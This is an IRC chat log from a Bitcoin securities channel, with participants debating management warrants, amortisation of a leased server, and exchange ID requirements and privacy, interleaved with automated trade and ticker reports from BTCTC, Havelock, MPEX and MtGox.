shitton of warrants in the first place Jul 01 21:44:08 lol Jul 01 21:44:43 which kinda hedges the entire thing Jul 01 21:44:53 well... one of the advantages of management getting ssws in the first place. Jul 01 21:44:53 you lost me here Jul 01 21:45:11 is the motivation to get a god deal on them Jul 01 21:45:11 well, play out an example for me. Jul 01 21:45:22 YOU lost me Jul 01 21:45:26 YOU play an example Jul 01 21:45:54 just one question Jul 01 21:46:06 ok. company A has 100 shares issued, of which managwement owns 10. company A has 100 shares issued as sws to mnanagement Jul 01 21:46:19 now what's management to hedge re its 10 issued shares ? Jul 01 21:46:56 why would it want to hedge them against getting diluted since it also owns 10x more warrants ? Jul 01 21:47:15 exactly. Jul 01 21:47:25 (and i read that correctly on the MG statement, you have as much outstanding warrants than issued shares, right?) Jul 01 21:47:29 so the issuing of sws to managemend hedges against this situation you described Jul 01 21:47:45 as IPO issued yes. Jul 01 21:48:08 doesn't this somehow equate to the management not really acting in the shareholder's interest ? Jul 01 21:48:19 i imagine exactly the contrary. Jul 01 21:48:22 how do you fiugre ? Jul 01 21:48:45 [BTCTC] [TAT.ASICMINER] 53 @ 0.045 = 2.385 BTC [+] Jul 01 21:48:46 dunno, it was a legitimate question Jul 01 21:48:56 [HAVELOCK] [ASICM] 3 @ 0.04460001 = 0.1338 BTC [-] Jul 01 21:48:57 well, if share value drops management has nothing. Jul 01 21:48:58 [HAVELOCK] [ASICM] 31 @ 0.0446 = 1.3826 BTC [-] Jul 01 21:48:59 [HAVELOCK] [ASICM] 144 @ 0.044529 = 6.4122 BTC [-] Jul 01 21:49:00 [HAVELOCK] [ASICM] 104 @ 0.04452899 = 4.631 BTC [-] Jul 01 21:49:11 if share value doubles management realises half that gain, investors the other half Jul 01 21:49:28 hmm Jul 01 21:49:54 guess it requires some additionnal brain crunching here :-) Jul 01 21:50:07 anyway, i had a question regarding the financial statements Jul 01 21:50:23 simple example : A and B meet to make a fishery. A contributes 100 BTC gets 100 shares, B is going to fish, gets 100 sws at 1. Jul 01 21:50:33 if at the end the fishery is worth 200 btc, Jul 01 21:50:34 [HAVELOCK] [HIM] 55 @ 0.288201 = 15.8511 BTC [-] Jul 01 21:50:47 then B brings 100 btc in, gets his 100 shares, and now a 300 btc corp is divided to 200 shares Jul 01 21:50:53 each getting 150 and going home Jul 01 21:50:55 explained like that it sounds about right :-) Jul 01 21:51:00 was the idea anyway Jul 01 21:51:01 [BTCTC] [ASICMINER-PT] 1 @ 4.599938 BTC [-] Jul 01 21:51:12 okay, other question Jul 01 21:51:30 why don't you start amortising (spellt that way) the server right away ? Jul 01 21:51:40 (spellt that way?) Jul 01 21:51:45 lol Jul 01 21:51:50 ugh Jul 01 21:52:06 bon, pourquoi tu commences pas à l'amortir tout de suite ton serveur ? Jul 01 21:52:44 pque amortissements au fin d'un interval non ? Jul 01 21:52:50 [BTCTC] [S.DICE-PT] 500 @ 0.002348 = 1.174 BTC [+] Jul 01 21:52:52 [HAVELOCK] [ASICM] 191 @ 0.04452899 = 8.505 BTC [-] Jul 01 21:53:18 actually let's switch back to english, ppl will be trying to translate your frogspeak for no avail Jul 01 21:54:06 le sujet est maintenant brouettes Jul 01 21:54:12 [BTCTC] [TAT.ASICMINER] 4 @ 0.045 = 0.18 BTC [+] Jul 01 21:54:13 either you account for them on a monthly basis (which i've never seen, but this is BTC after all) or on a yearly basis, you seem to go for the former, so my question is "why don't you start accounting for an expense of 1/12th of the server value on month #1" Jul 01 21:54:30 [BTCTC] [TAT.ASICMINER] 225 @ 0.045 = 10.125 BTC [+] Jul 01 21:54:31 also you're amortising on one year IIUC which is quite creative :-) Jul 01 21:54:47 because i'm of the school that the respective charge belongs in month 2 and is reported in month 2 Jul 01 21:54:48 [BTCTC] [ASICMINER-PT] 2 @ 4.55 = 9.1 BTC [-] Jul 01 21:54:56 kakobrekla: la brouette moldave, ma position sexuelle préférée Jul 01 21:54:57 as in, amortisation only after a FULL period Jul 01 21:55:12 if its after a full period it can;'t be reported in the respective period Jul 01 21:55:35 lol ok davout Jul 01 21:55:47 it represents an expense on month #1 too since you probably need it for dev purposes, and it's ok to prorate Jul 01 21:56:08 [BTCTC] [TAT.ASICMINER] 17 @ 0.044 = 0.748 BTC [-] Jul 01 21:56:11 i could prorate, i just don't see that i'd have to. Jul 01 21:56:13 why are you amortising in the first place btw ? Jul 01 21:56:27 because if you liquidate today you have a server worth x Jul 01 21:56:32 yeah, I'm just asking questions :-) Jul 01 21:56:38 and if you liquidate in 6 months you have a server worth x/2 Jul 01 21:56:49 [BTCTC] [TAT.ASICMINER] 6 @ 0.044 = 0.264 BTC [-] Jul 01 21:56:51 yes, whip me Jul 01 21:56:54 lol Jul 01 21:57:25 [BTCTC] [BITVPS] 20 @ 0.001081 = 0.0216 BTC [+] Jul 01 21:57:38 [BTCTC] [AMC-PT] 22 @ 0.00105 = 0.0231 BTC [-] Jul 01 21:57:40 so then, why one year? i don't know with other countries but in france you usually amortise IT stuff on 3 years, the rest on 5 and buildings on 20 Jul 01 21:57:57 cause i got it for a year. Jul 01 21:58:15 you're getting me confused, did you buy it? for one year? Jul 01 21:58:42 yes ? Jul 01 21:58:49 [BTCTC] [TAT.ASICMINER] 4 @ 0.044 = 0.176 BTC [-] Jul 01 21:59:10 [BTCTC] [BTC-TRADING-PT] 1 @ 0.7448 BTC [-] Jul 01 22:00:58 [BTCTC] [TAT.ASICMINER] 16 @ 0.04301 = 0.6882 BTC [-] Jul 01 22:00:59 [BTCTC] [TAT.ASICMINER] 39 @ 0.042801 = 1.6692 BTC [-] Jul 01 22:01:01 [BTCTC] [TAT.ASICMINER] 24 @ 0.0428 = 1.0272 BTC [-] Jul 01 22:01:04 like to me it sounds contradictory, either you rent for a limited time, or you buy and it's yours forevar Jul 01 22:01:36 that sounds a little nutty. what's leasing in this approach ? Jul 01 22:01:47 and what's "forever" mean. Jul 01 22:01:59 [BTCTC] [TAT.ASICMINER] 30 @ 0.044 = 1.32 BTC [+] Jul 01 22:02:21 [BTCTC] [BASIC-MINING] 17 @ 0.186999 = 3.179 BTC [+] Jul 01 22:02:27 [BTCTC] [BASIC-MINING] 2 @ 0.185 = 0.37 BTC [-] Jul 01 22:02:37 [BTCTC] [RSM] 4 @ 0.015021 = 0.0601 BTC [+] Jul 01 22:02:42 [BTCTC] [ASICMINER-PT] 8 @ 3.4 = 27.2 BTC [-] Jul 01 22:02:49 [BTCTC] [ASICMINER-PT] 1 @ 4.505 BTC [+] Jul 01 22:02:56 [BTCTC] [TAT.ASICMINER] 7 @ 0.045 = 0.315 BTC [+] Jul 01 22:03:46 what happens at the end of the year? Jul 01 22:03:52 do you have to give box back to another entity? Jul 01 22:04:18 did you buy the physical box? or did you buy the right to use it for one year, it think that's the question Jul 01 22:04:29 [BTCTC] [ASICMINER-PT] 1 @ 4.51 BTC [+] Jul 01 22:04:39 [HAVELOCK] [ASICM] 17 @ 0.04488 = 0.763 BTC [+] Jul 01 22:04:43 the later Jul 01 22:04:55 ok, that's what i call "renting" Jul 01 22:05:02 benkay yeah. because i don't want to be stuck with one year odl boxes. Jul 01 22:05:24 they go on to run shared servers or w/e loosened out boxes do in this life. Jul 01 22:05:30 to a french person, leasing is like some stuff you do usually with cars where you pay a fat premium the first month, and then rent it Jul 01 22:05:37 actually... they probably end up sold to the government Jul 01 22:05:46 [BTCTC] [ASICMINER-PT] 1 @ 4.545 BTC [+] Jul 01 22:06:09 so yeah, i don't really understand why you'd amortise something that you do not own Jul 01 22:06:24 since it's not going to stay in your books as an asset Jul 01 22:06:40 well it is... for a year. Jul 01 22:06:44 and it's accounted under "tangibles" Jul 01 22:06:54 [BTCTC] [BASIC-MINING] 60 @ 0.187 = 11.22 BTC [+] Jul 01 22:07:12 when you have amortised something, that this something reaches a zero accounting value, that means you still own the physical thing Jul 01 22:07:34 which is consistent with accounting for it under "tangibles" Jul 01 22:07:36 so i have a special knapsack where i keep the 0 value items ? Jul 01 22:07:58 an item that has a 0 accounting value may still have a shitton of utility value Jul 01 22:08:15 the proper way to account for this is to write an expense under "IT services" Jul 01 22:08:16 the rationale behind that separation between "tangibles" and "intangibles and goodwill" was that some items have a resale value. these are tangible. Jul 01 22:08:26 some others do not or not necessarily. these are intangible. Jul 01 22:08:48 davout yes it would be, at the cost of making a more extensive account plan than "cash", "type 1" and "type 2" Jul 01 22:09:04 [HAVELOCK] [ASICM] 160 @ 0.04452899 = 7.1246 BTC [-] Jul 01 22:09:09 to me tangible is something i can touch, in my understanding IP is intangible yet it can be resold Jul 01 22:09:25 it might just be a language problem here Jul 01 22:09:28 well arguably you can touch myserver Jul 01 22:09:40 except it's not yours Jul 01 22:09:44 you didn't buy it Jul 01 22:09:47 ... Jul 01 22:09:52 you bought the right to use it for one year Jul 01 22:09:59 well in this sense the house you own is not "yours" as you only have fee simple on it. Jul 01 22:10:05 i own it, under a certain title. Jul 01 22:10:55 can you resell the box ? no, so what you bought is a service, tracking its accounting value makes no real sense Jul 01 22:10:59 at the end of amortization, you don't have a thing to sell for scrap value. Jul 01 22:10:59 yes i can Jul 01 22:11:15 of course i can resell it. it's mine >< Jul 01 22:11:16 no you can resell the remainder of your one year period Jul 01 22:11:19 right Jul 01 22:11:19 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0047 BTC [-] Jul 01 22:11:28 you don't really own land unless you have 'Infangthief' on it! Jul 01 22:12:09 the box is not yours, the service is, you can resell the service, but you don't usually amortise IT services like this (which is another way of saying it's horribly wrong) Jul 01 22:12:15 [BTCTC] [TAT.ASICMINER] 2 @ 0.044999 = 0.09 BTC [-] Jul 01 22:12:20 mp amortizes how he wants yo Jul 01 22:12:24 ok, here's the concept. i spent some BTC. Jul 01 22:12:36 these btc can't be taken as a one time charge, as they reflect a multi-period thing Jul 01 22:12:57 it matches the amortisation just whine what are you whining about! Jul 01 22:13:03 meh Jul 01 22:13:31 no but i mean, is there something lost ? Jul 01 22:13:47 [MPEX] [S.MPOE] 3600 @ 0.00082595 = 2.9734 BTC [+] Jul 01 22:14:00 (i mean it matches the amortisation just fine*) Jul 01 22:14:10 [BTCTC] [TAT.ASICMINER] 14 @ 0.044999 = 0.63 BTC [-] Jul 01 22:14:23 the whole "it can't be taken as a one time charge" is relevant when you use expenses to reduce your net result as a way to reduce your taxes, i don't think it has much relevance in BTC-LAND Jul 01 22:14:26 whoops Jul 01 22:14:40 [BTCTC] [DMS.MINING] 30 @ 0.019999 = 0.6 BTC [-] Jul 01 22:14:46 anyway, like you said, it doesn't really matter that much Jul 01 22:15:15 well it may grow to matter in time Jul 01 22:15:20 if I was you I would account it as an expense every month Jul 01 22:15:30 one of the reasons im doing this is to sound out some sort of accounting/reporting scheme for nonzero asset companies Jul 01 22:15:32 it also depends on whether you already shelled the money out Jul 01 22:15:35 so the poring is much appreciated Jul 01 22:16:11 i'll sell you a full accounting piece of software Jul 01 22:16:13 XD Jul 01 22:16:20 [BTCTC] [TAT.ASICMINER] 34 @ 0.044999 = 1.53 BTC [-] Jul 01 22:16:22 [BTCTC] [TAT.ASICMINER] 6 @ 0.044999 = 0.27 BTC [-] Jul 01 22:16:24 as to the relevance :it's not just taxes. why should a shareholder that buys now get the benefit of an arbitrary charge for 1 year ? Jul 01 22:16:29 which i used for accounting at my first startup Jul 01 22:16:33 [BTCTC] [B.YABMC] 100 @ 0.006 = 0.6 BTC [-] Jul 01 22:17:05 tyvm. i'm trying to reinvent the wheel deliberately. both gaap and irfs suck. Jul 01 22:17:11 but how does your way of accounting change that? doesn't the server already exist ? Jul 01 22:17:29 yes, it does already exist Jul 01 22:17:46 so, i'm not sure what your way of accounting changes Jul 01 22:18:03 especially since what i'm saying is just : "do the same thing, just use different words" Jul 01 22:18:03 well let's look at it. company has 100 btc. it buys "the right to use a boat for 1 year" for 50. Jul 01 22:18:28 what's the value of the company next month ? 50 + whatever it fished or 50 + whatever it fished + 50 * 11 / 12 ? Jul 01 22:19:04 now that makes sense Jul 01 22:19:08 so that's the concept. Jul 01 22:19:08 i guess latter Jul 01 22:19:38 yeah, i see where you come from Jul 01 22:19:55 now, i agree this is at least attackable from a "standard accounting" perspective, Jul 01 22:20:03 for a number of reasons. i just don't think they actually work. Jul 01 22:20:38 i don't know how exactly to express this, but i think that somehow you're trying to get accounting to do something it's not really supposed to Jul 01 22:21:31 if you paid the hosting fee monthly it wouldn't be an issue at all Jul 01 22:21:47 as in, we wouldn't have this debate Jul 01 22:22:45 yeah but the shit is, hosting is this complex fucking industry Jul 01 22:23:08 wherein all sorts of weird constrainsts operate. like, nobody wants used gear. everyone wants to own geaer. nobody wants to pay for anything. Jul 01 22:23:30 if i don't guarantee usage the provider won't open new boxes of gear for me. Jul 01 22:23:50 if i do guarantee usage it makes no sense to pretend im paying monthly, and it actually helps his cash flow a ton to pay him upfront Jul 01 22:23:51 etfc. Jul 01 22:23:52 that's where the MP aura stops I guess :-) Jul 01 22:24:13 [MPEX] [S.MPOE] 1464 @ 0.00082561 = 1.2087 BTC [-] Jul 01 22:24:41 well, tbh the way you're accounting for it makes much more sense if explained that way Jul 01 22:24:51 i may be able to live with it Jul 01 22:24:55 maybe Jul 01 22:26:11 [BTCTC] [AMC-PT] 9 @ 0.00101 = 0.0091 BTC [-] Jul 01 22:26:12 anyway, next month i'll charge domain names Jul 01 22:26:14 these I OWN Jul 01 22:26:18 and they will amortise over... Jul 01 22:26:20 a year. Jul 01 22:26:32 does one ever own a domain ? Jul 01 22:26:36 well wtf. Jul 01 22:26:43 XD Jul 01 22:26:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.044998 BTC [-] Jul 01 22:26:57 yeah. so you know... accounting gotta meet internet at some point. Jul 01 22:27:03 word Jul 01 22:27:40 [BTCTC] [DMS.MINING] 1 @ 0.019501 BTC [-] Jul 01 22:27:41 [BTCTC] [DMS.MINING] 39 @ 0.019501 = 0.7605 BTC [-] Jul 01 22:29:29 [BTCTC] [TAT.ASICMINER] 9 @ 0.044998 = 0.405 BTC [-] Jul 01 22:29:31 [BTCTC] [TAT.ASICMINER] 8 @ 0.044999 = 0.36 BTC [+] Jul 01 22:30:01 [MPEX] [S.MPOE] 7694 @ 0.00082561 = 6.3522 BTC [-] Jul 01 22:30:03 [MPEX] [S.MPOE] 315 @ 0.00082467 = 0.2598 BTC [-] Jul 01 22:30:32 well, i'm off, ttyl all Jul 01 22:31:37 [BTCTC] [TAT.ASICMINER] 10 @ 0.044002 = 0.44 BTC [-] Jul 01 22:31:45 [BTCTC] [TAT.ASICMINER] 13 @ 0.044001 = 0.572 BTC [-] Jul 01 22:32:36 :davout Bonne chance ! Jul 01 22:33:15 [BTCTC] [TAT.ASICMINER] 5 @ 0.044999 = 0.225 BTC [+] Jul 01 22:33:36 ;;ticker Jul 01 22:33:36 MtGox BTCUSD ticker | Best bid: 89.10502, Best ask: 89.12999, Bid-ask spread: 0.02497, Last trade: 89.12999, 24 hour volume: 42825.80763141, 24 hour low: 88.75001, 24 hour high: 98.18010, 24 hour vwap: 92.10373 Jul 01 22:33:43 ;;bids 0 Jul 01 22:33:44 There are currently 26202984 bitcoins demanded at or over 0.0 USD, worth 9748770.74663 USD in total. | Data vintage: 0.0068 seconds Jul 01 22:33:47 [BTCTC] [DMS.PURCHASE] 6 @ 0.049418 = 0.2965 BTC [-] Jul 01 22:34:08 [BTCTC] [BASIC-MINING] 3 @ 0.1869 = 0.5607 BTC [-] Jul 01 22:34:28 [BTCTC] [BASIC-MINING] 3 @ 0.187 = 0.561 BTC [+] Jul 01 22:34:32 [BTCTC] [TAT.ASICMINER] 8 @ 0.044999 = 0.36 BTC [+] Jul 01 22:36:14 [BTCTC] [DMS.SELLING] 5 @ 0.0291 = 0.1455 BTC [-] Jul 01 22:36:15 [BTCTC] [DMS.SELLING] 14 @ 0.029 = 0.406 BTC [-] Jul 01 22:36:46 [BTCTC] [DMS.MINING] 23 @ 0.019999 = 0.46 BTC [+] Jul 01 22:37:07 see u soon 100$, you was a good mate ! Jul 01 22:39:14 [HAVELOCK] [VTX] 6 @ 0.509999 = 3.06 BTC [+] Jul 01 22:39:15 [HAVELOCK] [VTX] 10 @ 0.51 = 5.1 BTC [+] Jul 01 22:39:15 [HAVELOCK] [VTX] 10 @ 0.515 = 5.15 BTC [+] Jul 01 22:39:17 [HAVELOCK] [VTX] 1 @ 0.517799 BTC [+] Jul 01 22:39:18 [HAVELOCK] [VTX] 1 @ 0.5178 BTC [+] Jul 01 22:39:28 [HAVELOCK] [VTX] 1 @ 0.5178 BTC [+] Jul 01 22:42:54 ;;next Jul 01 22:42:54 Error: Couldn't get RSS feed. Jul 01 22:43:11 I would bet it still said "expecting retest of 88" Jul 01 22:43:22 Of course, sooner or later that would be true :-) Jul 01 22:44:23 http://www.reddit.com/r/BitcoinStocks/comments/1hfyao/100th_having_problems_delivering_pcb_assembly/ <- They're two weeks delayed... Jul 01 22:44:23 i have a bet coming due next monday. btc trading above 70. wasn't concerned at the time of bet, am slightly concerned now. Jul 01 22:44:38 that said "concerned" is relative, stakes are several rounds of beer. Jul 01 22:44:52 i don't gamble like you crazie Jul 01 22:44:54 crazies Jul 01 22:45:30 [MPEX] [O.USD.P101T] 650 @ 0.64936888 = 422.0898 BTC [+] Jul 01 22:45:43 Who are you calling crazy? HELP, THE BANANAS ARE TRYING TO EAT ME! QUICK! GIVE ME THAT TOILET SEAT! Jul 01 22:46:15 [HAVELOCK] [ASICM] 432 @ 0.0444 = 19.1808 BTC [-] Jul 01 22:48:10 [BTCTC] [ASICMINER-PT] 3 @ 4.505 = 13.515 BTC [-] Jul 01 22:48:13 [BTCTC] [ASICMINER-PT] 1 @ 4.501 BTC [-] Jul 01 22:48:15 [BTCTC] [ASICMINER-PT] 1 @ 4.5 BTC [-] Jul 01 22:48:26 ;;ticker Jul 01 22:48:27 MtGox BTCUSD ticker | Best bid: 91.59311, Best ask: 91.98000, Bid-ask spread: 0.38689, Last trade: 92.14290, 24 hour volume: 43495.29781796, 24 hour low: 88.75001, 24 hour high: 98.18010, 24 hour vwap: 92.08325 Jul 01 22:48:37 !t m ^oix Jul 01 22:48:39 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 61.23802783 / 62.69294856 / 114.42277287 (835 shares, 434.58 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Jul 01 22:48:43 [MPEX] [S.MPOE] 63 @ 0.00082595 = 0.052 BTC [+] Jul 01 22:48:44 [MPEX] [S.MPOE] 10688 @ 0.00082661 = 8.8348 BTC [+] Jul 01 22:48:45 for srs. Jul 01 22:48:59 [MPEX] [S.MPOE] 1911 @ 0.00082698 = 1.5804 BTC [+] Jul 01 22:50:34 I have no idea what you just said, which, I'm sure, is why I don't have an account on MPEx. Jul 01 22:51:40 [BTCTC] [S.MPOE-PT] 2 @ 0.000999 = 0.002 BTC [+] Jul 01 22:56:49 [BTCTC] [AMC-PT] 3 @ 0.0011 = 0.0033 BTC [+] Jul 01 23:00:16 [BTCTC] [BASIC-MINING] 4 @ 0.187 = 0.748 BTC [+] Jul 01 23:01:02 [BTCTC] [TAT.ASICMINER] 10 @ 0.044999 = 0.45 BTC [+] Jul 01 23:01:11 [BTCTC] [TAT.ASICMINER] 5 @ 0.044999 = 0.225 BTC [+] Jul 01 23:01:26 [HAVELOCK] [ASICM] 1 @ 0.0442 BTC [-] Jul 01 23:01:57 [BTCTC] [S.DICE-PT] 27 @ 0.002348 = 0.0634 BTC [+] Jul 01 23:02:07 [BTCTC] [TAT.ASICMINER] 16 @ 0.044999 = 0.72 BTC [+] Jul 01 23:02:15 [HAVELOCK] [ASICM] 229 @ 0.0442 = 10.1218 BTC [-] Jul 01 23:03:05 [HAVELOCK] [ASICM] 1 @ 0.044 BTC [-] Jul 01 23:03:21 [BTCTC] [TAT.ASICMINER] 24 @ 0.045 = 1.08 BTC [+] Jul 01 23:04:44 [MPEX] [S.MG] 4727 @ 0.00016875 = 0.7977 BTC [+] Jul 01 23:06:09 [BTCTC] [TAT.ASICMINER] 90 @ 0.045 = 4.05 BTC [+] Jul 01 23:06:16 [HAVELOCK] [ASICM] 4 @ 0.044 = 0.176 BTC [-] Jul 01 23:08:14 [MPEX] [S.MPOE] 4800 @ 0.00082467 = 3.9584 BTC [-] Jul 01 23:08:16 [BTCTC] [GSDPT] 33 @ 0.002299 = 0.0759 BTC [+] Jul 01 23:09:40 [BTCTC] [BASIC-MINING] 10 @ 0.180003 = 1.8 BTC [-] Jul 01 23:10:08 [BTCTC] [BASIC-MINING] 2 @ 0.180002 = 0.36 BTC [-] Jul 01 23:10:26 [BTCTC] [BASIC-MINING] 1 @ 0.18 BTC [-] Jul 01 23:11:27 [HAVELOCK] [ASICM] 65 @ 0.044 = 2.86 BTC [-] Jul 01 23:12:16 [BTCTC] [TAT.ASICMINER] 100 @ 0.045 = 4.5 BTC [+] Jul 01 23:12:55 [HAVELOCK] [HIM] 55 @ 0.299999 = 16.4999 BTC [+] Jul 01 23:12:59 [HAVELOCK] [ASICM] 5 @ 0.044 = 0.22 BTC [-] Jul 01 23:13:10 [HAVELOCK] [ASICM] 1 @ 0.0442 BTC [+] Jul 01 23:13:51 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00499 = 0.01 BTC [+] Jul 01 23:15:30 [BTCTC] [BASIC-MINING] 10 @ 0.187 = 1.87 BTC [+] Jul 01 23:19:53 [BTCTC] [ASICMINER-PT] 3 @ 4.499893 = 13.4997 BTC [-] Jul 01 23:19:55 [BTCTC] [ASICMINER-PT] 1 @ 4.499897 BTC [+] Jul 01 23:19:58 [HAVELOCK] [ASICM] 138 @ 0.0442 = 6.0996 BTC [+] Jul 01 23:20:05 [HAVELOCK] [ASICM] 3 @ 0.04487989 = 0.1346 BTC [+] Jul 01 23:20:53 [BTCTC] [ASICMINER-PT] 3 @ 4.5 = 13.5 BTC [+] Jul 01 23:21:14 price :) Jul 01 23:22:08 [BTCTC] [TAT.ASICMINER] 10 @ 0.044998 = 0.45 BTC [-] Jul 01 23:22:10 [BTCTC] [TAT.ASICMINER] 20 @ 0.044999 = 0.9 BTC [+] Jul 01 23:23:40 [BTCTC] [ASICMINER-PT] 6 @ 4.5 = 27 BTC [+] Jul 01 23:23:45 [BTCTC] [ASICMINER-PT] 1 @ 4.5 BTC [+] Jul 01 23:28:48 [HAVELOCK] [ASICM] 4 @ 0.0444 = 0.1776 BTC [-] Jul 01 23:31:27 [BTCTC] [B.YABMC] 3 @ 0.008 = 0.024 BTC [+] Jul 01 23:34:40 [HAVELOCK] [ASICM] 396 @ 0.0444 = 17.5824 BTC [-] Jul 01 23:37:32 [MPEX] [S.MPOE] 4100 @ 0.00082478 = 3.3816 BTC [+] Jul 01 23:37:34 [MPEX] [S.MPOE] 10187 @ 0.00082698 = 8.4244 BTC [+] Jul 01 23:37:51 [MPEX] [S.MPOE] 3600 @ 0.00082736 = 2.9785 BTC [+] Jul 01 23:39:21 [HAVELOCK] [ASICM] 100 @ 0.0448799 = 4.488 BTC [+] Jul 01 23:40:07 [BTCTC] [DMS.SELLING] 1 @ 0.02998 BTC [+] Jul 01 23:40:23 [HAVELOCK] [ASICM] 45 @ 0.04488 = 2.0196 BTC [+] Jul 01 23:40:43 [HAVELOCK] [ASICM] 88 @ 0.04488 = 3.9494 BTC [+] Jul 01 23:41:01 [HAVELOCK] [ASICM] 10 @ 0.04488 = 0.4488 BTC [+] Jul 01 23:43:01 [HAVELOCK] [ASICM] 10 @ 0.0449 = 0.449 BTC [+] Jul 01 23:43:15 just removed a brown recluse from my bedroom. i guess that's a win! Jul 01 23:43:16 [HAVELOCK] [ASICM] 41 @ 0.04498999 = 1.8446 BTC [+] Jul 01 23:43:32 hi guys when are the sdice and bbet dividends due Jul 01 23:43:47 [BTCTC] [AMC-PT] 900 @ 0.0011 = 0.99 BTC [+] Jul 01 23:44:11 bitcollapse: have you looked on their respective asset pages ? Jul 01 23:44:55 [HAVELOCK] [ASICM] 40 @ 0.0449 = 1.796 BTC [-] Jul 01 23:45:44 yes it should be today for sdice? Jul 01 23:46:15 ugh, bitcoins exchange infrastructure is collapsing Jul 01 23:46:18 look again, it seems it has been published Jul 01 23:46:28 wut? Jul 01 23:46:46 alot of exchangers like aurumxchange are out of business Jul 01 23:46:49 fastcash4bitcoins Jul 01 23:47:02 and bitinstant is now nothing more then a bad paypal it requires absurd ID requirements Jul 01 23:47:24 bitcollapse: lol Jul 01 23:47:27 how come paypal can transmit money and not ask for ID uploads? Jul 01 23:47:41 you obviously don't have the slightest clue of what you're talking about... Jul 01 23:47:42 [BTCTC] [ASICMINER-PT] 1 @ 4.546 BTC [+] Jul 01 23:47:49 explain davout Jul 01 23:47:59 bitinstant requires an account now with ID verification Jul 01 23:48:14 that just tosses out any bitcoin privacy and makes it worse then a bank Jul 01 23:48:43 the various laws don't usually give the slightest shit about your privacy Jul 01 23:48:56 [BTCTC] [TAT.ASICMINER] 47 @ 0.044899 = 2.1103 BTC [-] Jul 01 23:49:05 davout yes but if a bitcoin adress is linked to an ID Jul 01 23:49:09 its permanent public information Jul 01 23:49:09 yet, as an exchange you have to follow them, unless you want to live a quite painful experience Jul 01 23:49:14 so what ? Jul 01 23:49:16 bitinstant isnt an exchange Jul 01 23:49:27 why doesnt paypal require ID documents uploaded? Jul 01 23:49:33 they do Jul 01 23:49:45 no they dont you can open one with a credit card or bank account Jul 01 23:50:00 but they never ask for ID unless its very business specific Jul 01 23:50:05 bitcollapse: opening an account != keeping an account open Jul 01 23:50:09 they do Jul 01 23:50:13 for a very simple reason Jul 01 23:50:15 when? Jul 01 23:50:19 because the law requires them to Jul 01 23:50:21 for my paypal they didnt ask anything Jul 01 23:50:22 when you try to use it Jul 01 23:50:36 your personal experience can hardly be generalized Jul 01 23:50:37 ive been using it for years they just verified me with a automated phone call Jul 01 23:50:41 maybe it takes a year, but they will get to it Jul 01 23:50:47 ive never had to submit documents to paypal Jul 01 23:50:52 maybe your not moving that much Jul 01 23:51:05 bitinstant doesnt move much either for personal accounts Jul 01 23:51:12 they have low max's yet require absurd ID's Jul 01 23:51:19 and keep in mind that they indirectly ID you since they get the information from your various payment means Jul 01 23:51:23 the point is ID's dont work well with bitcoin because adress's are public knowledge Jul 01 23:51:29 nobody can see my paypal activity except paypal Jul 01 23:51:37 bitcollapse: that's a good one Jul 01 23:51:37 and nsa Jul 01 23:51:44 sure and government Jul 01 23:51:48 but not everyone Jul 01 23:51:58 bitcollapse: no offense, but you have no idea of what you're talking about Jul 01 23:51:59 bitcoin adress linked to ID is even more dangerous Jul 01 23:51:59 hi Jul 01 23:52:07 dabout how dont i? Jul 01 23:52:10 bitcollapse: then don't do it Jul 01 23:52:24 the anonymous bitcoin exchange methods are crumbling Jul 01 23:52:36 hence the price decline going along with it Jul 01 23:52:38 that isnt suprising to anyone Jul 01 23:52:38 pigeons sent me a copy of his ID for safe keeping Jul 01 23:52:41 total trust Jul 01 23:52:55 my feathers look bad in that picture though Jul 01 23:53:04 pigeons i like the concept of bitcoin Jul 01 23:53:11 but i dont like having an ID linked to a public adress Jul 01 23:53:15 then dont Jul 01 23:53:18 where all transactions can be traced extremely easily Jul 01 23:53:24 easier then any bank Jul 01 23:53:37 and bitinstant is now nothing more then a bad paypal it requires absurd ID requirements <<< details ? Jul 01 23:53:39 [HAVELOCK] [ASICM] 176 @ 0.0448799 = 7.8989 BTC [-] Jul 01 23:53:39 and its as private as your paypal info, you arent giving that address to anyone but bitinstant Jul 01 23:53:39 id ont get why bitcoiners are going along with it Jul 01 23:53:57 mircea_popescu: before using bitinstant was easy Jul 01 23:54:03 [HAVELOCK] [ASICM] 869 @ 0.04499 = 39.0963 BTC [+] Jul 01 23:54:05 [HAVELOCK] [ASICM] 466 @ 0.045 = 20.97 BTC [+] Jul 01 23:54:06 you walked into a walmart and filled out a moneygram form Jul 01 23:54:10 mircea_popescu: http://blog.bitinstant.com/blog/2013/6/30/website-update.html Jul 01 23:54:12 now they require an account and all sorts of ID Jul 01 23:54:13 bitcollapse: open your own exchange, get some experience, then you will understand Jul 01 23:54:30 charlie shrem is a sell out Jul 01 23:54:31 bitcollapse: they are going along with it to stay out of jail Jul 01 23:54:34 [BTCTC] [TAT.ASICMINER] 17 @ 0.044898 = 0.7633 BTC [-] Jul 01 23:54:43 oh why bitcoins sorry Jul 01 23:54:46 why? you dont need to show an ID when you are buying walmart goods Jul 01 23:54:48 i thought you said bitinstant Jul 01 23:54:56 "We have temporarily limited transactions in some locations, and we apologize for the inconvenience. " Jul 01 23:55:02 how do you know bitcoiners are going along with it Jul 01 23:55:06 heh. not list the locations. these people just won't fucking learn what open means already Jul 01 23:55:10 maybe bitinstant will go out of business Jul 01 23:55:20 bitcoin is not defined as a financial instrument anywhere Jul 01 23:55:29 comon Jul 01 23:55:43 you know thats silly Jul 01 23:55:48 must be fake Jul 01 23:55:50 if it quacks like a duck ... Jul 01 23:55:50 if i buy electronics at walmart and trade them for drugs does walmart need to ID me everytime i buy them? Jul 01 23:55:53 that'd be because it's not a financial instrument. Jul 01 23:56:03 it must be a pidgeon, right? Jul 01 23:56:08 exactly mircea_popescu Jul 01 23:56:10 it's game gold. Jul 01 23:56:18 your DOLLARS however, ARE a financial instrument. Jul 01 23:56:22 yes Jul 01 23:56:30 but i dont get IDed buying stuff with dollars Jul 01 23:56:34 so stop trying to trade that shit for bitcoin and nobody cares about your id anymore. Jul 01 23:56:41 yes, actually, you do. Jul 01 23:56:42 solved Jul 01 23:56:45 this because dollars are shit. Jul 01 23:56:46 when mircea? Jul 01 23:56:52 try getting some cough medicine. Jul 01 23:56:55 all this talk of IDs at store counters will seem nostalgically quaint when start needing a working RFID beacon just to pass through public doorways. Jul 01 23:56:57 or a gun or a car Jul 01 23:57:03 or a house or a hotel 